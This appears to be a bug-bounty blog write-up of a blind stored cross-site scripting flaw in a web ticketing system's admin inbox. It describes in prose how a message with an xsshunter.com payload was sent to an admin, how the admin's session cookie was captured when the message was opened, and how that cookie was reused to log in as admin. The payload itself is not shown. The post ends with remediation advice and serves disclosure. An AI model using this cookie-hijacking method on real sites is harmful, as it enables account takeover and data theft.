IT Security Enthusiast • Bug Hunter • Penetration Tester

Blind Stored XSS and Hijack Admin Login

B

Description

Blind Stored cross-site scripting (also known as second-order or persistent XSS) arises when an application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way.

If an attacker can control a script that is executed in the victim’s browser, then they can typically fully compromise that user. The attacker can carry out any of the actions that are applicable to the impact of reflected XSS vulnerabilities.

In terms of exploitability, the key difference between reflected and stored XSS is that a stored XSS vulnerability enables attacks that are self-contained within the application itself. The attacker does not need to find an external way of inducing other users to make a particular request containing their exploit. Rather, the attacker places their exploit into the application itself and simply waits for users to encounter it.

Affected Endpoint

  • https://[redacted]/ticket/dashboard/baca?route=inbox&r=[redacted]
  • https://[redacted]/admin/ticket/baca?route=inbox&r=[redacted]

Impact

  • Attacker can control a script that is executed in the victim’s browser, then they can typically fully compromise that user.
  • Stealing credential user (cookie).
  • Log in as a different user (like another user’s or admin).
  • Stealing Information from another user’s or admin account.

Steps to Reproduce

  • The concept.
Concept of Stored XSS Attack
  • I log in as a user account.
  • Go to “Tanya Jawab” page > “Hubungi Admin” > choose one admin > Send her “malicious” message.
  • To make a malicious message, I use the feature of https://xsshunter.com and the payload is:
  • And I pretended to ask questions (random question).
  • Intercept request with a burp, and get a response with the HTML tag that will be sent, and at this stage, I assume that we can send malicious code into our destination email (in this case the admin email).
HTML tag appears in the content
Insert malicious code from https://xsshunter.com
  • The injection phase has finished, now it’s just a matter of time when the admin opens an email from me containing malicious code.
Injection phase has finished with error after “> (good things)
  • After waiting for about 2-3 days, I got an email notification stating that the admin has opened the email I sent and the code has been triaged! YAY!
Get email notification from xsshunter.com
  • After successfully stealing admin cookies, the last step is to copy the cookies obtained into your user account and run it then we will log in as an admin account.

Remediation

To keep yourself safe from XSS, you must sanitize your input. Your application code should never output data received as input directly to the browser without checking it for malicious code. (source)

2 comments

IT Security Enthusiast • Bug Hunter • Penetration Tester